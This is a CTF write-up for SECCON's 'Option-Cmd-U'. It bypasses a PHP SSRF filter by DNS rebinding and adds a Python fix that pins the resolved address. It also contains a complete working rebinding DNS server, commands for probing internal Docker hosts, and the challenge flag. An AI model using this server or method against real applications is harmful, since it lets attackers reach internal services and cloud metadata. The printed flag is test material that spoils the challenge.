Tags: web dnsrebinding ssrf 

# ▼▼▼ Option-Cmd-U (Web: 190, 160/799 = 20.0%) ▼▼▼

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

```
No more "View Page Source"!
http://ocu.chal.seccon.jp:10000/index.php
```

---

# 【Information gathering】

`http://ocu.chal.seccon.jp:10000/index.php`

↓ Response when the URL is accessed

```

<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Option-Cmd-U</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bulma/0.7.5/css/bulma.min.css">
<script defer src="https://use.fontawesome.com/releases/v5.3.1/js/all.js"></script>
</head>
<body>
<div class="container">
<section class="hero">
<div class="hero-body">
<div class="container">
<h1 class="title has-text-centered has-text-weight-bold">
Option-Cmd-U
</h1>
<h2 class="subtitle has-text-centered">
"View Page Source" is no longer required! Let's view page source online :-)
</h2>
<form method="GET">
<div class="field has-addons">
<div class="control is-expanded">
<input class="input" type="text" placeholder="URL (e.g. http://example.com)" name="url" value="">
</div>
<div class="control">
<button class="button is-link">Submit</button>
</div>
</div>
</form>
</div>
</div>
</section>
<section class="section">

                    



</section>
</div>
</body>
</html>
```

---

## 【1:/index.php?action=source】

`http://ocu.chal.seccon.jp:10000/index.php?action=source`

↓ Response when the URL is accessed (the page now shows its own PHP source)

```

<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Option-Cmd-U</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bulma/0.7.5/css/bulma.min.css">
<script defer src="https://use.fontawesome.com/releases/v5.3.1/js/all.js"></script>
</head>
<body>
<div class="container">
<section class="hero">
<div class="hero-body">
<div class="container">
<h1 class="title has-text-centered has-text-weight-bold">
Option-Cmd-U
</h1>
<h2 class="subtitle has-text-centered">
"View Page Source" is no longer required! Let's view page source online :-)
</h2>
<form method="GET">
<div class="field has-addons">
<div class="control is-expanded">
<input class="input" type="text" placeholder="URL (e.g. http://example.com)" name="url" value="<?= htmlspecialchars($_GET['url'], ENT_QUOTES, 'UTF-8') ?>">
</div>
<div class="control">
<button class="button is-link">Submit</button>
</div>
</div>
</form>
</div>
</div>
</section>
<section class="section">

                    


array(
'follow_location' => false,
'timeout' => 2
)
))));
}
}
?>

</section>
</div>
</body>
</html>
```

↓ The PHP block is only partially visible in the output above; the lines that matter are quoted below

---

`if($parsed_url["scheme"] !== "http"){`

Only the `http` scheme is accepted (no `https`, `file`, `gopher`, etc.)!!

---

`} else if (gethostbyname(idn_to_ascii($parsed_url["host"], 0, INTL_IDNA_VARIANT_UTS46)) === gethostbyname("nginx")) {`

The host part of the URL is resolved and compared with the address of `nginx`, so the front-end web server is a container named `nginx`, and any hostname that resolves to it is rejected!!

Direct access to localhost (i.e. `nginx`) is prohibited!!

Note that this check only looks at the result of one lookup. The fetch below resolves the hostname a second time, and nothing ties the address that was checked to the address that is actually connected to.

---

```
highlight_string(file_get_contents(idn_to_ascii($url, 0, INTL_IDNA_VARIANT_UTS46),
false,
stream_context_create(array(
'http' => array(
'follow_location' => false,
'timeout' => 2
)
))));
```

The URL is fetched with `file_get_contents` and the body is displayed with `highlight_string`.

`follow_location` is `false`, so a redirect from an external server to an internal address is not followed, and the request times out after 2 seconds. `file_get_contents` resolves the hostname itself rather than reusing the address the check looked at.
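The pattern above (resolve for the check, resolve again for the fetch) is exactly what DNS rebinding exploits. As an added example that is not part of the original writeup or the challenge code, here is that vulnerable flow in Python beside a pinned version: resolve exactly once, check the address, then connect to that same address and send the original name in the `Host` header. `BLOCKED_IPS` stands in for `gethostbyname("nginx")`, `rebinding_resolver` is a test double that hands out alternating answers instead of talking to DNS, and 93.184.216.34 is an arbitrary public address standing in for an attacker-controlled server. The hardened check also rejects every non-global address, which the challenge did not.

```python
import http.client
import ipaddress
import itertools
import socket
import urllib.parse
from typing import Callable, Optional, Tuple

# Stand-in for gethostbyname("nginx") in the challenge: the one address the
# original filter rejects (value taken from the writeup's scan).
BLOCKED_IPS = {"172.25.0.3"}

Resolver = Callable[[str], str]


def is_blocked(ip: str) -> bool:
    """Reject the front-end address and, unlike the challenge, every non-global
    address (loopback, RFC 1918, link-local, ...), so other containers and
    cloud metadata endpoints are out of reach too."""
    addr = ipaddress.ip_address(ip)
    return ip in BLOCKED_IPS or not addr.is_global


def vulnerable_target(url: str, resolve: Resolver) -> Optional[Tuple[str, str]]:
    """Mirrors the challenge: the hostname is resolved once for the check and
    again for the fetch. Returns (hostname, ip the fetch connects to), or None
    when the filter rejects the URL."""
    parsed = urllib.parse.urlsplit(url)
    if parsed.scheme != "http" or not parsed.hostname:
        return None
    if is_blocked(resolve(parsed.hostname)):          # first lookup: the check
        return None
    return parsed.hostname, resolve(parsed.hostname)  # second lookup: the fetch


def pinned_target(url: str, resolve: Resolver) -> Optional[Tuple[str, str]]:
    """Hardened flow: resolve exactly once, check that address, and hand the
    same address to the HTTP client so no second lookup can change it."""
    parsed = urllib.parse.urlsplit(url)
    if parsed.scheme != "http" or not parsed.hostname:
        return None
    ip = resolve(parsed.hostname)
    if is_blocked(ip):
        return None
    return parsed.hostname, ip


def pinned_get(url: str, resolve: Resolver = socket.gethostbyname,
               timeout: float = 2.0) -> Optional[bytes]:
    """Fetch url by connecting to the pinned IP while sending the original name
    in Host. Redirects are not followed, matching follow_location => false."""
    target = pinned_target(url, resolve)
    if target is None:
        return None
    host, ip = target
    parsed = urllib.parse.urlsplit(url)
    path = parsed.path or "/"
    if parsed.query:
        path += "?" + parsed.query
    host_header = host if parsed.port is None else f"{host}:{parsed.port}"
    conn = http.client.HTTPConnection(ip, parsed.port or 80, timeout=timeout)
    try:
        # An explicit Host header makes http.client skip its automatic one.
        conn.request("GET", path, headers={"Host": host_header})
        return conn.getresponse().read()
    finally:
        conn.close()


def rebinding_resolver(answers) -> Resolver:
    """Constructed test double for a rebinding DNS server: successive lookups
    of any name cycle through the given answers; no network involved."""
    cycle = itertools.cycle(answers)
    return lambda _host: next(cycle)


if __name__ == "__main__":
    # 93.184.216.34 stands in for the attacker's public server.
    print("vulnerable:", vulnerable_target("http://localhost.my_server/flag.php",
                                           rebinding_resolver(["93.184.216.34", "172.25.0.3"])))
    print("pinned:    ", pinned_target("http://localhost.my_server/flag.php",
                                       rebinding_resolver(["93.184.216.34", "172.25.0.3"])))
```

Pinning is the whole fix: `pinned_target` returns the address it checked, so a resolver that changes its answer between lookups gains nothing. Rejecting every non-global address additionally covers `127.0.0.1`, RFC 1918 ranges and `169.254.169.254`, which matters as soon as the fetcher runs in a cloud VM rather than a CTF container.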

---

Let's solve it with **DNS rebinding**!!

(Note) The intended solution was a Host/Split attack (the `idn_to_ascii` call is the hint):
https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization-wp.pdf

---

## 【2:/flag.php】

`http://ocu.chal.seccon.jp:10000/flag.php`

`Forbidden. Your IP: (My_IP_address)`

flag.php refuses the request and echoes the client's source IP, so it is restricted by source address. It has to be reached from an address it trusts, presumably one inside the Docker network.

---

## 【3:/docker-compose.yml】

`http://ocu.chal.seccon.jp:10000/docker-compose.yml`

```
version: '3'

services:
  nginx:
    (...omitted...)
  php-fpm:
    (...omitted...)
```

Two containers are running: `nginx` (the front-end web server) and `php-fpm` (which runs `index.php`).

---

# 【exploit】DNSRebinding!!

### 1. Check the access source IP address

`GET /?url=http://ocu.chal.seccon.jp:10000/flag.php`

Forbidden. Your IP: `172.25.0.1`

Fetched through the SSRF via the public hostname, the request leaves the Docker network and comes back in, so flag.php sees the network gateway `172.25.0.1` (by Docker convention the `.1` address). The containers therefore live on the `172.25.0.x` network.

---

Next, probe the neighbouring addresses on that network to find `nginx`:

```
GET /?url=http://172.25.0.2/flag.php ⇒ Warning: file_get_contents(http://172.25.0.2/flag.php): failed to open stream: Connection refused in /var/www/web/index.php on line 60
GET /?url=http://172.25.0.3/flag.php ⇒ Oops, are you a robot or an attacker?
GET /?url=http://172.25.0.4/flag.php ⇒ Warning: file_get_contents(http://172.25.0.4/flag.php): failed to open stream: Host is unreachable in /var/www/web/index.php on line 60
```

`172.25.0.2` is up but has nothing listening on port 80 (most likely the `php-fpm` container itself), `172.25.0.4` does not exist, and `172.25.0.3` trips the `gethostbyname("nginx")` filter: the `Oops` message is index.php's rejection, not a reply from flag.php.

So the `nginx` IP address is `172.25.0.3`.

---

### 2. DNS settings

On the authoritative DNS server for a domain you control, give one name two A records: the internal `nginx` address and your own server's address.

```
localhost.my_server A 172.25.0.3
localhost.my_server A (my_server_IP_address)
```

Each request resolves the name twice (once in the check, once in `file_get_contents`). When the resolver rotates the order of the two records between lookups, the check sees your public address while the fetch gets `172.25.0.3`. Keep the TTL low and repeat the request until that order occurs.
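As an added example, not part of the original writeup, the following Python script is a minimal authoritative DNS responder that does the rebinding deliberately rather than relying on round-robin. Instead of the two A records above, it answers each A query for one name with a single record, alternating between the two addresses with TTL 0, so the check and the fetch inside one request tend to see different answers. It assumes you control a domain whose NS record points at the host running it; the name `localhost.my_server` and the address 93.184.216.34 (standing in for your server's public IP) are placeholders, and `build_query`/`answer_ips` exist only to exercise the responder offline.

```python
import itertools
import socket
import struct


def encode_name(name: str) -> bytes:
    """Wire-format a dotted name as length-prefixed labels, root-terminated."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(data: bytes, offset: int):
    """Read a name at offset, following a compression pointer if present.
    Returns (name, offset just past the name)."""
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0 == 0xC0:                      # compression pointer
            ptr = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            labels.append(decode_name(data, ptr)[0])
            return ".".join(labels), offset + 2
        offset += 1
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def build_query(name: str, txid: int = 0x1234, qtype: int = 1) -> bytes:
    """One-question recursion-desired query, used to test the responder."""
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_query(data: bytes):
    """Return (txid, qname, qtype, raw question section) of a one-question query."""
    txid, _flags, qdcount = struct.unpack("!HHH", data[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    qname, offset = decode_name(data, 12)
    qtype, _qclass = struct.unpack("!HH", data[offset:offset + 4])
    return txid, qname, qtype, data[12:offset + 4]


def build_response(query: bytes, ip, ttl: int = 0) -> bytes:
    """Authoritative NOERROR reply echoing the question, with one A record if ip
    is given. TTL 0 asks caching resolvers not to keep the answer between lookups."""
    txid, _qname, qtype, question = parse_query(query)
    answer = b""
    if ip is not None and qtype == 1:
        # name = pointer to offset 12 (the question name), type A, class IN, rdlength 4
        answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(ip)
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, 1 if answer else 0, 0, 0)  # QR=1, AA=1
    return header + question + answer


class RebindingResolver:
    """Answers A queries for one name by cycling through the given addresses."""

    def __init__(self, name: str, answers):
        self.name = name.rstrip(".").lower()
        self._cycle = itertools.cycle(answers)
        self.served = []                                # log of answers handed out

    def handle(self, query: bytes) -> bytes:
        _txid, qname, qtype, _q = parse_query(query)
        if qname.lower() != self.name or qtype != 1:
            return build_response(query, None)          # not our name: empty answer
        ip = next(self._cycle)
        self.served.append(ip)
        return build_response(query, ip)


def answer_ips(response: bytes):
    """Extract the A-record addresses from a response (used to check replies)."""
    _txid, _flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", response[:12])
    _name, offset = decode_name(response, 12)
    offset += 4                                         # skip QTYPE and QCLASS
    ips = []
    for _ in range(ancount):
        _name, offset = decode_name(response, offset)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", response[offset:offset + 10])
        offset += 10
        if rtype == 1:
            ips.append(socket.inet_ntoa(response[offset:offset + rdlen]))
        offset += rdlen
    return ips


def serve(resolver: RebindingResolver, bind: str = "0.0.0.0", port: int = 53) -> None:
    """UDP loop; the domain's NS record must point at this host for queries to arrive."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind, port))
    while True:
        data, peer = sock.recvfrom(512)
        try:
            sock.sendto(resolver.handle(data), peer)
        except (ValueError, IndexError, struct.error, UnicodeDecodeError):
            continue                                    # malformed query, drop it


if __name__ == "__main__":
    # 93.184.216.34 stands in for the attacker's own server address.
    serve(RebindingResolver("localhost.my_server", ["93.184.216.34", "172.25.0.3"]))
```

Run it as root (port 53), then repeat `GET /?url=http://localhost.my_server/flag.php` until the check lands on the public address and the fetch on `172.25.0.3`; `served` shows the order handed out. Intermediate resolvers that ignore TTL 0 can still cache an answer, which is why retrying is part of the technique rather than a sign that it failed.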

---

### 3. Get the flag

`GET /?url=http://localhost.my_server/flag.php`

The check resolves the name to your server's address and passes; `file_get_contents` resolves it again, gets `172.25.0.3`, and connects to nginx from inside the Docker network, which flag.php trusts. The flag comes back:

`SECCON{what_a_easy_bypass_314208thg0n423g}`